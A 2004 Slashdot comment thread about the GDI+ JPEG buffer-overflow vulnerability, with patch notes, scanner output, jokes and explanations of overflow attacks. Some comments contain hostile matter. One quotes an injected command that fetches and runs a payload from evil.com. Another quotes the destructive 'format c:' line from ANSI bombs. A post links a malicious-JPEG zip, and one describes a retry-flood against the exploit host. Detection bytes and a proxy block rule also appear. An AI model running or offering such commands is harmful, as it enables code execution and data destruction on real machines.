Policy changed after sasser requiring all machines to be patched to a certain point before registering into the resnet system. It's still at WinXP SP1 right now with no signs of requiring SP2 or updating once your MAC's registered.

The only amusing part to this long story is that we knock our network down long before anyone can use our pipe to knock someone else off.

Re:The joys of keeping a campus virus-free

[DannyiMac]

I work for the University of Kentucky ResNet and when a student's computer appears to exhibit viral activity they will be blocked by their IP address by the Communications department. Then the student calls and we check if the IP is blocked or not. If they are, we send them to the anti-virus web page--the only web page the student can access from their computer. Once they install the virus software the university supplies, remove the virus(es), and upgrade to the latest service pack for their version of Windows 2000/XP, we unblock them. If they lie to us and don't do this they simply get blocked again. This is how UK controls its virus problem and I think it's a good method. Students also get blocked for other reasons as well, such as port scanning for it's possible virus behavior. Lastly, a DMCA complaint, where the student gets caught sharing copyrighted materials by organizations outside of UK (I don't think the RIAA has gotten anyone on campus yet, however).

Why thanks!

[ufpdom]

Now i can go exploiting people! Thx for the virus easynews! http://easynews.com/virus/virus-jpeg.zip

Self fulfilling prophecy anyone?

[PoderOmega]

Come on... admit it you've all been dying for this slashdot posting. You didn't think all this hype about the microsoft GDI thing wasn't going to pay off? Well there you go.... feast on microsofts pain....

Limited Accounts?

[WoTG]

Anyone know if this exploit can be done when the user is using a Windows Limited account?

Re:Limited Accounts?

[mtnharo]

From the sound of things, the exploit will be triggered, but this particular piece of code won't be able to do much, since it tries to install software that requires an Admin level account. Having a limited account won't prevent the user from running the exploit code, but it does prevent the exploit from leading to a system-level breach, unless some of privilege-escalation exploit is included as well.

Microsoft Patch

[bcreane]

FYI, here's the fix from M$ for this exploit: Security Bulletin

We ARE DDOS'ing it now

[DigitalRaptor]

It is very hard to get in right now. I've set FlashFXP to retry 1,000 times every 15 seconds. We'll see how that goes.

The more of us that keep this connection tied up doing innocent things for the next 48 hours, the better.

There really needs to be a distributed DDOS for spammer sites, virus sites, etc. Use The Force for good, I say.

God dammit!

Why doesn't slashdot allow you to post images! :)

Re:God dammit!

[Dorothy+86]

because those of us who have remained goatse free would like to keep it that way :-P

(yes, I know you're being silly, but what the hell :))

Re:RUN ZONEALARM!

[AndrewStephens]

That will help in this case, becuase the malicious code downloads other programs, but what if the code just looks for JPGs on your local drive to modify. Pictures get emailed around so often these days that the virus would still spread at a decent rate.
The code could also contain its own backdoor software, IRC client, etc. Remember with a buffer overflow the code is executing in another program that already has rights to the network, so personal firewalls don't help.

Re:Stop downloading porn?

[base3]

Stop being a tease and saying we can't have pr0n and then using language like "patches the hole." Thank you.

NX Protection?

[rsmith-mac]

Just out of curiosity, does anyone know if x86 no-execute protection(the NX bit, aka the XD bit, aka Data Execution Protection) prevents against this? With the release of SP2 and DEP support, it would seem that this would be a good test to see if DEP is all its cracked up to be.

Re:NX Protection?

I can't speak for this virus specifically, but DEP isn't the end-all-be-all of buffer overflow prevention. For example:

char overflowed[10];
char command="echo \"some silly command\"";

int main(){
strcpy(argv[1], overflowed);
exec(command);
}

We can overflow overflowed to change command into something like "sh \"wget http:\\evil.com\virus > virus.sh;virus.sh\"" or somesuch. Bonus points if you diddle with the C library's jump table so that any system call ends up being exec(..). The key here is that no data segments are executed, so NX protection wouldn't help.

Sex!

[InfiniteWisdom]

What, now you can't even WATCH sex without protection?

Lament from an old-timer

[bigberk]

In my day, an article like this would have been a downright joke. Seriously, this is such a milestone that I'm filing the article in my permanent news archives.

In retrospect I don't know why we thought such a thing was impossible for so long? After all, buffer overflows or other coding problems can result in malicious code executing. I guess what we didn't expect "back then" was that computers primarily engaged in networking activities would be running vital parsers - HTML, ActiveX, images etc - within the operating system itself, with administrator level privileges.

Wouldn't it make sense to limit the scope of any kind of modular parser/crypto using privilege isolation, so that even if malicious code starts running it is utterly incapable of affecting anything else?

i.e. shouldn't all such modules - crypto, image, parser run within some kind of privilege jails and communicate with the involved application using something like a socket? Hell, couldn't Windows do just that and wrap it up so API users don't notice? What am I missing here? I'm not picking on Windows here, same thing could be done on *NIX.

Re:Lament from an old-timer

[IchBinEinPenguin]

... would be running vital parsers - HTML, ActiveX, images etc - within the operating system itself ...

Remember, this was a LEGAL decision, not a TECHNICAL one.

Killing NS without all those messy anti-trust problems required IE to become part of the OS.

From a technical standpoint it was a moronic idea, as a lot of people said at the time.

Re:Lament from an old-timer

[bastard42]

i.e. shouldn't all such modules - crypto, image, parser run within some kind of privilege jails and communicate with the involved application using something like a socket?

No. It's slow.
You have to copy the data back and forth. Not only that, you double your memory for that "operation" (sender has a copy and receiver has a copy).

OTOH, it's a cool abstraction, and it's called pipes. All programs should pass data as file. Your file can be a pipe. Sockets are named pipes. GUI and speed be damned.


P.S. I still think plan9 is supercool.

Crappy MS "GDI Detection Tool"

[whoever57]

I just ran the updates on an XP machine. It claimed that there was vulnerable GDI code on the machine and I should go to the office update page. Guess what: the office update page said there were no updates. So, apparanetly the system is vulnerable, but there is no way to fix it. Wonderful!

Re:Crappy MS "GDI Detection Tool"

[ceeam]

Let me guess - do you perchance use one the "blackisted" serialz for your office registration? If not then sorry, but if so - take note that WindowsUpdate verifies your reg number and feels free to behave accordingly.

This'll be good for catching downloaders . . .

[base3]

. . . of kiddy porn. The pervs grab the jpeg, load it, and it quietly calls home to the FBI, where a dot matrix printer prints out another warrant for a judge's signature . . .

Re:This'll be good for catching downloaders . . .

[dpete4552]

If the FBI is allowed to trade drugs to get to drug dealers then I'm pretty sure they're allowed to trade kiddie porn pics to get to pervs.

Re:This'll be good for catching downloaders . . .

[base3]

2. The infected JPEG is a legal photo, in which case the "alleged perv" has broken no law, and there is no basis for the warrant.

What if it's titled as kiddy porn, but it's not--just bait to see who's viewing it? Sure, then the "alleged perv" hasn't committed a crime by downloading and viewing it, but the fact that s/he has might just be enough probable cause for a sealed Grand Jury indictment, followed by a warrent for an unnanounced full search of the downloader's PC . . . (IANAL, especially NA criminal L).

Re:This'll be good for catching downloaders . . .

[ceeam]

Well - how many people viewed the certain hello.jpg image willingly and knowing what they are going to find? How difficult it would be for me to dupe you or someone else to load the image you mention if I find its URL?

Is it named yet?

[jaysones]

If there's no name yet, how about the Medusa virus?

Hacked CNN Advertisments

[8400_RPM]

So what happens when someone hacks the ad server that cnn or google uses, and puts this jpeg up?

Millions of instant zombies.

Thats f*cking scarry....

Re:Hacked CNN Advertisments

[Wes+Janson]

If I understood the article correctly, you have to actually save the virus file, and then try to view it. Only then will it infect. From what I read, it would seem just opening a webpage with the "image" on it would not infect a computer.

Re:Hacked CNN Advertisments

[Pecisk]

It actually doesn't make sense because browsing web is...just saving pages/pictures/etc in cache AND viewing it. So I guess it would be any kind of difference, if you save it.

Only difference is then when different libs are used for viewing JPG.

Re:Hacked CNN Advertisments

[SvendTofte]

That doesn't make sense. As you browse the web, you download the image. Unless the program is something strange (Moz), then it would probably use Windows libraries to display the image, and bam.

The tech note at MS tells all

Claims Win 98SE is not affected! Great, all MS users can take a bold step back.

TechNet Home Security Microsoft Security Bulletin MS04-028 Buffer Overrun in JPEG Processing (GDI+) Could Allow Code Execution (833987) Issued: September 14, 2004 Updated: September 21, 2004 Version: 1.2 Summary Who should read this document: Customers who use any of the affected operating systems, affected software programs, or affected components. Impact of Vulnerability: Remote Code Execution Maximum Severity Rating: Critical Recommendation: Customers should apply the update immediately. Security Update Replacement: None Caveats: If you have installed any of the affected programs or affected components listed in this bulletin, you should install the required security update for each of the affected programs or affected components. This may require the installation of multiple security updates. See the FAQ section of this bulletin for more information. Tested Software and Security Update Download Locations:

Affected Software:

Microsoft Windows XP and Microsoft Windows XP Service Pack 1 - Download the update (KB833987) Microsoft Windows XP 64-Bit Edition Service Pack 1 - Download the update (KB833987) Microsoft Windows XP 64-Bit Edition Version 2003 - Download the update (KB833987) Microsoft Windows Server(TM) 2003 - Download the update (KB833987) Microsoft Windows Server 2003 64-Bit Edition - Download the update (KB833987) Microsoft Office XP Service Pack 3 - Download the update (KB832332) Microsoft Office XP Service Pack 2 - Download the administrative update (KB832332) Microsoft Office XP Software: Outlook® 2002 Word 2002 Excel 2002 PowerPoint® 2002 FrontPage® 2002 Publisher 2002 Access 2002 Microsoft Office 2003 Software: Outlook® 2003 Word 2003 Excel 2003 PowerPoint® 2003 FrontPage® 2003 Publisher 2003 Access 2003 InfoPath(TM) 2003 OneNote(TM) 2003 Microsoft Project 2002 (all versions) and Microsoft Project 2002 Service Pack 1 (all versions) - Download the update (KB831931) Microsoft Project 2003 (all versions) - Download the update (KB838344) Microsoft Visio 2002 Service Pack 1 (all versions) and Microsoft Visio 2002 Service Pack 2 (all versions) - Download the update (KB831932) Microsoft Visio 2003 (all versions) - Download the update (KB838345) Microsoft Visual Studio .NET 2002 - Download the update (KB830348) Microsoft Visual Studio .NET 2002 Software: Visual Basic .NET Standard 2002 Visual C# .NET Standard 2002 Visual C++ .NET Standard 2002 Microsoft Visual Studio .NET 2003 - Download the update (KB830348) Microsoft Visual Studio .NET 2003 Software: Visual Basic .NET Standard 2003 Visual C# .NET Standard 2003 Visual C++ .NET Standard 2003 Visual J# .NET Standard 2003 The Microsoft .NET Framework version 1.0 SDK Service Pack 2 - Download the update (KB867461) Microsoft Picture It!® 2002 (all versions) - Download the update Microsoft Greetings 2002 - Download the update Microsoft Picture It! version 7.0 (all versions) - Download the update Microsoft Digital Image Pro version 7.0 - Download the update Microsoft Picture It! version 9 (all versions, including Picture It! Library) - Download the update Microsoft Digital Image Pro version 9 - Download the update Microsoft Digital Image Suite version 9 - Download the update Microsoft Producer for Microsoft Office PowerPoint (all versions) Microsoft Platform SDK Redistributable: GDI+ - Download the update Office Users Note Office XP Service Pack 2 and Office XP Service Pack 3 are both vulnerable to this issue. However the security update for Office XP Service Pack 2 is only provided as part of the Office XP administrative security update. For more information, see the Security Update Information section. Office

Re:SP2 Firewall

[BubbleNOP]

Furthermore, you would not need a firewall if you were not running services that bound to things other than localhost. Since Windows firewall (prior to SP2, not sure whether SP2 has this functionality) doesn't let you pick who gets through to your ports, users should have the choice to shut down all ports exposed to the net. Keeping ports open and firewalled to everybody seems stupidly inefficient.

ANSI Bombs

[hpavc]

Does anyone remember those ANSI bombs of old? I remember BBS's had all sorts of elaborate protections against them, zipfile comments etc.

Re:ANSI Bombs

[pclminion]

I remember ANSI bombs. For those who do not:

ANSI.SYS was a device driver that implemented a basic "terminal protocol" on IBM PC screens back in the MS-DOS days. It could manipulate the cursor, show text in colors, and it had a few other features like key redefinition.

An ANSI bomb was a sequence of commands to the ANSI driver. If the commands were somehow written to the terminal, they would redefine the Enter key to do something like "echo y | format c:". Thus, the next time the victim pressed Enter, the C: would be formatted.

There were a few was to trick your target into displaying the ANSI codes. One way was to embed them in the comment section of a pkzip archive, so that when the file was extracted the codes would be printed to the screen.

Re:bug month

[ConceptJunkie]

"Quality freefall"? Not really. They've always produced third tier code.

I dunno. NT 3.51 always seemed to be rock-frickin'-solid, but then I didn't use it for long before NT 4 came out.

Of course, Windows 95 was stillborn and they kept pumping the corpse full of formaldehyde for 5 years for they finally let it rot in peace, but the NT branch was really good until they started making every app they wrote effectively part of the core OS.

Remember when NT ran on 4 different processor architectures and Win32 was just one API on top of the kernel in addition to Posix and OS/2? Now that IE and WMP are practically part of the kernel it seems so long ago, and yet, in a sense, it was far more advanced because it was modular enough and clean enough to be ported.

Re:Modify this virus to prank some friends

[dpete4552]

You'd be breaking several laws in the process. So I wouldn't suggest it ;)

HTML-trap

[HermanAB]

Well, maybe it is time to change my HTML-trap poisoned files list to *.*

That'll fix it...

Terminology

[jjgm]

Technically, this is a Trojan Horse, not a virus.

It's not a virus

[LS]

Sorry to be nitpicky here, but this is a trojan horse, not a virus. A virus propagates through replication.

LS

Anyone think it's interesting...

[JohnsonWax]

That /.ers can reference generic sounding apps like GraphicConverter and Preview without mention of the operating system?

Apple really has come a long way around here, eh?

Re:Anyone think it's interesting...

[Yaztromo]

Apple really has come a long way around here, eh?

For the record, I bought my first Mac (a 12" PowerBook G4) this past spring based in significant part on all the good things I had read about Apple's latest offerings here on /. .

Yaz.

I wish Windows was like the Mac in this area...

[Chordonblue]

It's all pretty simple there. To install something you have to put in the admin password. Unix made easy.

The way Apple does it (by app) is FAR more intelligent than having to make a user an admin or log out of the system entirely to log in as an admin.

I have a few applications here at the school that demand admin privs. I've all but given up trying to restrict them. But as anyone who has seen the proliferation of unwanted toolbars can attest - the cost is high.

Re:I wish Windows was like the Mac in this area...

[Nurgled]

Windows features a "Run As..." dialog which can be used to execute a program as a different user than the one logged in. Unfortunately, it's quite hidden. To access it, one must hold down shift and right-click on the icon for the executable (or a shortcut to it) and choose "Run As...". You can then enter the username/password you wish to use and hit OK to start the program.

Of course, it'd be better if it'd just happen automatically when you run something that requires admin privs, such as System control panel or an installer, but in the installer case there are so many different kinds of installer out there that it'd be impossible for Windows to know what's an installer and what isn't. Allowing applications to say "Hey Windows, I need to run as Administrator!" might be a solution, but then most of the worms around masquerade as things the user might want to run anyway, so they'd probably just go ahead and throw in the Administrator password much like they just click "Yes" when Internet Explorer offers to install BonzaiBuddy.

I'll say it again. . .

[Fantastic+Lad]

Quietly this time. . .

Interesting that this virus, which has been in the wings and known of by select groups for years now, should at this time be given lots of promotion, (a few virus releases and big, loud press attention like a freekin' summer movie advertising run), right when the most important US election in the history of mankind is gearing up.

Having people scared out of the public places so that they can't discuss the events which are about to unfold. . ?

And some dorks still laugh at me and say I'm a paranoid conspiracy nut.

--Goodness! Well, if conspiracies don't exist, why are there laws like, 'Conspiracy to commit _____' on the books? And who but the lying psychos in government are better suited to pulling such stunts? Only a nut would actually lower his/her guard over the next couple of months!

Count on this: If any 'terrorism' happens in the next 5 weeks, you can be sure it will have been be aided and abetted by the US and/or Israeli secret services.

Not that you'll be able to talk about it on-line, what with all the scary viruses and all!

Buckle up, kids. This stretch of road is about to get bumpy.

-FL

Tutorial on GDI Scan to find vulnerable apps

[Grinler]

Bleeping Computer has a tutorial on how to use GDI Scan, offered by ISC, to find apps with the vulnerable gdiplus.dll. The tutorial can be found here:

GDI Scan Tutorial and how to fix the GDI+ JPEG Vulnerability

Either update those apps so they dont have the problem anymore, or do not use the app.

Re:Tutorial on GDI Scan to find vulnerable apps

[pe1chl]

This page refers to a download location for an updated gdiplus.dll, but the extracted file is dated 04-05-2004.
Is that really the fixed version? Did Microsoft know about this problem for so long?

Better GDI+ detector

[Fallen+Andy]

...at isc.sans.org (internet storm center). Do
not use the one from microsoft. It *sucks*.
Watch dshield (like a hawk). Read www.cert.org.
read "comp.risks" (usenet).

and still lose too much time..

What about Clippy?

[AmazingRuss]

We didn't have Clippy the paperclip in 1994...those were dark times indeed. Praise be to Microsoft, for delivering anthropomorphized office supplies unto the wretched masses!

I've got a workaround!

[TheNarrator]

The workaround is to not use any programs which require graphics. Please switch to using the command prompt for all applications until a patch has been made. Edlin is the recommended editor for security minded users. Now Microsoft just needs to post documentation on how to edit microsoft word format docs via binary editing in edlin and we'll be back to normal!

How do they reencode?

[SuperKendall]

MSN reencodes all images to PNG

That brings to mind the question of if the reader on the server is using a standard library that might have buffer exploits, so that you could alter the server to start feeding out PNG's with viruses (assuming a similar attack could be found in the PNG reader in windows, not sure if that's true or not).

Re:how and what

[MillionthMonkey]

you're a goddamn idiot. a suitably constructed jpeg will cause an overflow in the gdi+ library which ie and most msft programs use to render jpegs, when that happens the jpeg can be made such that the overflow will cause virus code to be loaded. god you're an idiot.

Jesus, an obvious end user asks a perfectly legitimate question and you call him an idiot for being surprised by the notion of a hostile JPEG- something that should rightfully amaze everybody. I doubt he understood your high level description. To the grandparent: here is a meandering crappy description of how a buffer overflow attack works:

A function call, in C, pushes the current program counter on the stack. Then it pushes the arguments onto the stack, and control jumps to the function which pops the arguments off the stack and does whatever with them. At the end it invokes a RET instruction that pops the program counter back off the stack and control jumps to the address there (to the point right after the CALL). These are just normal C calling conventions.

Variables defined in the function are stored on the stack. If a string like a URL (for example) needs to be defined, a buffer is allocated for it there. When the function returns, the space is automatically deallocated, the RET pops the program counter off the stack, and the function call returns. By default no bounds checking is done on data stored in these buffers. Some library functions, like gets(), don't do bounds checking. They can't, since they don't know the buffer size and would need to have it provided as an argument. Newer, safer versions exist that do take buffer size arguments, but that means these aren't the same library functions anymore. (FWIW the gets() call takes a pointer to a buffer of unknown size as an argument, reads a newlined string from stdin into the buffer, and returns the buffer pointer that was passed to it.)

It's up to the programmer to do bounds checking if he uses library calls vulnerable in this way. But this is extra work, and people are lazy. It's easier to just allocate a big, big buffer that's probably larger than you'll ever need, that "no reasonable URL" will ever exceed. So the programmer allocates a fixed 10K buffer on the stack and passes its address to a library function like gets().

The attacker gains control in these situations by creating a program input like a long, carefully crafted URL, slightly longer than 10K, that overflows the buffer inside the library function. The goal is to overwrite the return address on the stack with an address that's within the buffer. In the case of the Code Red worm, someone meticulously put together a URL that attacked an obscure ISAPI routine, and not only overwrote the return address, but also had machine code instructions waiting at the replacement address within the buffer- encoded right into the damn URL! (The buffer has been deallocated at this point, but hasn't been zeroed, so it's still there.)

It's harder to explain with a JPEG than with a URL. But a JPEG contains variable length data structures that are read into buffers on the stack. Someone writing the JPEG decoder forgot to do a bounds check- and so a mundane function for decoding JPEGs never returns. Instead it jumps into an endless loop that's been placed within the image buffer by the attacker.

So yes it is a bit like running an .EXE file, except for the fact that the code is hiding inside what is supposed to be data, not code, and it gains control of the CPU by smashing the stack.

Older versions of Notepad gagged on files larger than 64K, which seems suspicious. It's theoretically possible that a vulnerability could exist even in a text editor like Notepad allowing a carefully constructed .TXT file to execute arbitrary code. Who knows?

Is this based on the Independent JPEG Group lib?

[fraktus]

From www.ijg.org. This library is very popular.
And if yes, are all application linking this library subject to the vulnerability?

If yes this will be a lot of work to update all applications.

Re:how and what

[MillionthMonkey]

Here are the low level details of the JPEG exploit:

JPEG Comment sections (COM) allow for the embedding of comment data into a JPEG image. COM sections are marked beginning with 0xFFFE followed by a 16 bit unsigned integer in network byte order giving the total comment length + the 2 bytes for the length field; a single JPEG COM section could therefore contain 65533 bytes of invisible data (invisible in the sense that it's not rendered as part of the image). Because the JPEG COM field length variable is 2 bytes wide, and itself is included in the length value, the minimum value for this field is 2, this implies an empty comment. If the comment length value is set to 1 or 0, a buffer overflow occurs overwriting heap management structures.

The problem is GDIPlus normalizes the COM length prior to checking it's value; a starting length of 0 becomes -2 after normalization (0xFFFE unsigned), this value is converted to the 32 bit value 0xFFFFFFFE and is eventually passed on to memcpy which attempts to copy ~4G bytes into heap memory.

eEye Digital Security analyzed the bug and found that heap management structures are left in an inconsistent state with execution eventually reaching heap unlink instructions within RTLFreeHeap with EAX pointing to a pointer to data we control and we have direct control of EDX.

Detection could be accomplished by examining the JPEG image for the following byte sequence:

0xFF 0xFE 0x00 0x00 or 0xFF 0xFE 0x00 0x01

So you see what happened. The unchecked library call in this case was memcpy(). The decoder trusts its input and sends a small signed integer (-2) off to memcpy() without checking the sign bit- and memcpy() thinks -2 is a huge unsigned integer (4294967294). What's the difference? Any reasonable number is going to be positive anyway, right? Who would give a comment a negative length!

I saw someone make this kind of goof even in Java, where you have signed-only types forced on you. Someone forgot that InputStream.read() returns an unsigned byte as an int (between 0-255), and they cast it to a signed byte and back without the &0xFF to zero out the 24 high bits. That got caught right before our product release. The consequence in that case would have been a hash algorithm with inconsistent output between stream and byte array inputs- not a security nightmare like this, but a long lasting migraine nevertheless.

No update available for MS Office yet

[buro9]

The GDI Scan tool from ISC reveals that after all of the latest patches for Windows and Office, I am still left with vunerable .dll files within office.

Further... the version of the GDI redistributable on the MSDN site still includes a vunerable version of the GDI .dll dated May 2004.

On this fully patched Windows XP system GDI Scan reveals the following information:

Scanning Drive C:...
C:\Program Files\Common Files\Microsoft Shared\Office10\MSO.DLL
Version: 10.0.3501.0 -- Possibly vulnerable (Under OfficeXP only)
C:\Program Files\Common Files\Microsoft Shared\OFFICE11\MSO.DLL
Version: 11.0.6360.0
C:\Program Files\Common Files\Microsoft Shared\VGX\vgx.dll
Version: 6.0.2800.1106 -- Possibly vulnerable (Win2K SP2 and SP3 w/IE6 SP1 only)
C:\Program Files\Microsoft Office\OFFICE11\GDIPLUS.DLL
Version: 6.0.3264.0
C:\Program Files\Microsoft Works\GDIPLUS.DLL
Version: 5.1.3102.1360
C:\WINDOWS\$NtUninstallKB833998$\sx s.dll
Version: 5.1.2600.1106 -- Possibly vulnerable (Backup for uninstall purposes)
C:\WINDOWS\$NtUninstallKB839645$\sxs.dl l
Version: 5.1.2600.1336 -- Possibly vulnerable (Backup for uninstall purposes)
C:\WINDOWS\system32\dllcache\sxs.dll
Version: 5.1.2600.1515
C:\WINDOWS\system32\dllcache\vgx.dl l
Version: 6.0.2800.1106 -- Possibly vulnerable (Win2K SP2 and SP3 w/IE6 SP1 only)
C:\WINDOWS\system32\sxs.dll
Version: 5.1.2600.1515
C:\WINDOWS\WinSxS\x86_Microsoft.Win dows.GdiPlus_65 95b64144ccf1df_1.0.0.0_x-ww_8d353f13\GdiPlus.dll
Version: 5.1.3097.0 -- Possibly vulnerable (Windows Side-By-Side DLL)
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.GdiP lus_65 95b64144ccf1df_1.0.10.0_x-ww_712befd8\GdiPlus.dll
Version: 5.1.3101.0 -- Possibly vulnerable (Windows Side-By-Side DLL)
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.GdiP lus_65 95b64144ccf1df_1.0.2600.1360_x-ww_24a2ed47\GdiPlus .dll
Version: 5.1.3102.1360
Scan Complete.

What you can do now to limit the spread:
* Update all of your virus checkers and make sure that they are fully active (auto, not just on-demand).
* Disable images in your email applications, just use text only.
* Switch your primary browser to Firefox or another browser whose latest version is immune from this specific attack. If you have to still use IE, then do so only for sites you truly trust.

app not working != app vulnerable to virus

[sczimme]

* Eye of Gnome seemed to work okay, but I got all sorts of weird redraw problems when I tried to resize the window.
* Gimp (2.1) says the JPEG is unsupported and couldn't be imported by the filter, then segfaults.
* Konqueror seems to work okay, but just shows a tall black rectangle, and its spinner is still chugging away, as if it's still busy loading something.
* Firefox 0.9.3 has no troubles at all; it just shows a nice white rectangle on a white background

These programs are not vulnerable to the the exploit in the same way that Windows machines are vulnerable. In fact, the issues you saw appear to be in no way related to the intended result of the virus. GIMP's segfault seems to be the most serious of these, and it is still a minor problem. I believe all of your results can be achieved by opening a mangled/corrupted .jpg; the exploit code is irrelevant.

Nutshell: One cannot conclude that graphics-related processes/apps on Linux machines are vulnerable to this virus.

PS Conclusions posited based on "unprofessional research and wild conjectures" are likely to cause much more harm than good. Is this really necessary? (not a flame - just an observation)

Re:app not working != app vulnerable to virus

[ajs]

I don't think the poster was saying "these programs are vulnerable to this virus", but rather, "these programs seem to be vulnerable to a similar class of exploit"

Certainly Gimp's segfault points to some sort of bounds-checking problem, and is likely exploitable. NO application should load this image for display. Bounds checking during load should throw an exception (or the equivalent error status for C) for the image and the application should report that the image is corrupt. Under no circumstances should a low-level library be handing this image data further up the chain.

Re:app not working != app vulnerable to virus

[rjshields]

You make it sound like there's a possibilty this exploit might work under one of the afore mentioned softwares' image processing libraries.

This exploit was designed to work under microsoft code, so the chances of it working under any other image processing code are slim to none, unless some other programmer has coincidentally designed their code in precisely the same way and made exactly the same mistake.

Sorry, but this should be obvious.

Block all access to that particular host on proxy!

For all admins, simply block all access to that host on your proxy/firewall.
Be quick.

Sample squid code:

acl jpeg_exploit dst 209.171.43.27
http_access deny jpeg_exploit

Or, more reasonable:

acl block_dsthost dst "/usr/local/squid/etc/dsthost.list"
http_access deny block_dsthost

and stick 209.171.43.27 into that file (and all following IPs that will use that code).

Then use ClamAV to scan your squid-cache the next couple of days and remove infected files.

The fun never stops

[mwood]

There's been some discussion of the problems facing "fleet operators" due to this bug. It seems that various product teams have spewed so many private versions of the .DLLs all over users' systems that the people who maintain the security-patch list in XML just gave up. SMS won't detect the need for the patch, and neither will MBSA, I'm told. Whether SUS (standalone, not the Feature Pack for SMS) will is not yet clear.

Well, that's just dandy. I've got 200 machines that need patching and no centralized tools, maybe. Oh, joy.

Now I'm wondering how I'll ever trust those tools again.